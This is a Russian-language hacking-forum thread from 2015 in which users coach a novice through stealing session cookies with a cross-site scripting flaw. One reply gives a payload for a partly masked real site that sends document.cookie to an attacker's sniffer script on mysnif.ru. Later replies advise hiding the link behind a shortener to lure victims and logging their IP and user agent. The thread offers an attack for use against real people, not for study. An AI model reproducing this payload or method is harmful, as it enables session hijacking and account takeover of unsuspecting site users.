ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

03.08.2015, 14:13
|
|
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме: 2065
Репутация:
0
|
|
Сообщение от Filipp
↑
Я ж тебе сказал, поройся в гугле и почитай про пост. Если твоя XSS в посте, ссылочку ты уже не подставишь. Например, данные с полей для входа в админку идут пост параметром. Получается что-то типа того:
POST /admin.php
...
HTTP-HEADERS
...
login=alert(1)&password=pass.
Обычный переход по ссылке это GET. Что бы раскрутить твою XSS'ку в посте, нужно заманить жертву на твой сайт, а оттуда можно уже будет отправить POST запрос на уязвимый сайт.
Мне нужен снифф где я могу за место стандартной ссылочке подставить свою,наверное это нужно или можно любую?.
|
|
|

03.08.2015, 14:15
|
|
Участник форума
Регистрация: 10.05.2015
Сообщений: 251
Провел на форуме: 98300
Репутация:
31
|
|
Сообщение от SaNDER
↑
Мне нужен снифф где я могу за место стандартной ссылочке подставить свою,наверное это нужно или можно любую?.
А сниффер тут причем? Пользуйся тем чем пользовался.
|
|
|

03.08.2015, 14:29
|
|
Познающий
Регистрация: 08.07.2015
Сообщений: 74
Провел на форуме: 26489
Репутация:
4
|
|
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"] [/COLOR][/COLOR]
сохраняешь код выше в файл snif.php и заливаешь на хостинг, вместе с какой-нибудь картинкой с именем pict.jpg. допустим, твой домен mysnif.ru. тогда ссылка твоя будет вида:
******.net/players/?st=">window.location.href=' http://mysnif.ru/snif.php?cookies='+document.cookie;
Куки будут записаны в файл cookies.txt. Также неплохо бы еще записывать User-Agent и IP, при необходимости допилишь сам
|
|
|

03.08.2015, 14:37
|
|
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме: 2065
Репутация:
0
|
|
Сообщение от spiner
↑
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"] [/COLOR][/COLOR]
сохраняешь код выше в файл snif.php и заливаешь на хостинг, вместе с какой-нибудь картинкой с именем pict.jpg. допустим, твой домен mysnif.ru. тогда ссылка твоя будет вида:
******.net/players/?st=">window.location.href='
http://mysnif.ru/snif.php?cookies='+document.cookie;
Куки будут записаны в файл cookies.txt. Также неплохо бы еще записывать User-Agent и IP, при необходимости допилишь сам
Cлушай,а жертва должна быть зарегена на сайте в котором xss? .
Я PHP не знаю,но код я составил так .
.SpoilerTarget" type="button">Spoiler: cod
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL," http://..");
curl_setopt($ch, CURLOPT_HEADER, 0); //
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$result = curl_exec ($ch);
curl_close ($ch);
У меня сервер на Hostinger.ru,как сделать так что при открытий сайта переходило на
xss ?
|
|
|

03.08.2015, 22:33
|
|
Познающий
Регистрация: 08.07.2015
Сообщений: 74
Провел на форуме: 26489
Репутация:
4
|
|
что-то я не пойму, что ты хочешь сделать... жертве тебе нужно подсунуть ссылку, которую я приводил выше (лучше воспользоваться какой-нибудь сокращалкой). когда жертва по ней перейдет, ее будет перенаправлено на твой скрипт (сниффер), предварительно подставив куки в качестве параметров, откуда сниффер их возьмет и запишет в файл. жертва естественно должна быть зарегана на сайте, иначе нету смысла п*здить у нее куки.
|
|
|

03.08.2015, 23:30
|
|
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме: 2065
Репутация:
0
|
|
Сообщение от spiner
↑
что-то я не пойму, что ты хочешь сделать... жертве тебе нужно подсунуть ссылку, которую я приводил выше (лучше воспользоваться какой-нибудь сокращалкой). когда жертва по ней перейдет, ее будет перенаправлено на твой скрипт (сниффер), предварительно подставив куки в качестве параметров, откуда сниффер их возьмет и запишет в файл. жертва естественно должна быть зарегана на сайте, иначе нету смысла п*здить у нее куки.
Токо ты не ответил.а допилил я правильно по поводу user agent ?
|
|
|

03.08.2015, 23:38
|
|
Познающий
Регистрация: 08.07.2015
Сообщений: 74
Провел на форуме: 26489
Репутация:
4
|
|
Сообщение от SaNDER
↑
Токо ты не ответил.а допилил я правильно по поводу user agent ?
нет. ты подготавливаешь какой-то запрос на курл, а тебе нужно получить юзерагент пользователя, посетившего твой скрипт. храниться он в массиве $_SERVER, там же и айпи клиента:
$_SERVER['HTTP_USER_AGENT']
$_SERVER['REMOTE_ADDR']
|
|
|

03.08.2015, 23:40
|
|
Новичок
Регистрация: 31.07.2015
Сообщений: 18
Провел на форуме: 3668
Репутация:
0
|
|
и куки $_SERVER[' HTTP_COOKIE']
|
|
|

03.08.2015, 23:42
|
|
Познающий
Регистрация: 08.07.2015
Сообщений: 74
Провел на форуме: 26489
Репутация:
4
|
|
Сообщение от PHPussy
↑
и куки $_SERVER[' HTTP_COOKIE']
а куки то ему зачем?) если он их не выставит, то значение все равно будет пустым)) куки от сайта донора передаются в гет параметрах
|
|
|

03.08.2015, 23:50
|
|
Новичок
Регистрация: 31.07.2015
Сообщений: 18
Провел на форуме: 3668
Репутация:
0
|
|
Сообщение от spiner
↑
а куки то ему зачем?) если он их не выставит, то значение все равно будет пустым)) куки от сайта донора передаются в гет параметрах
я про пхпинжект
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|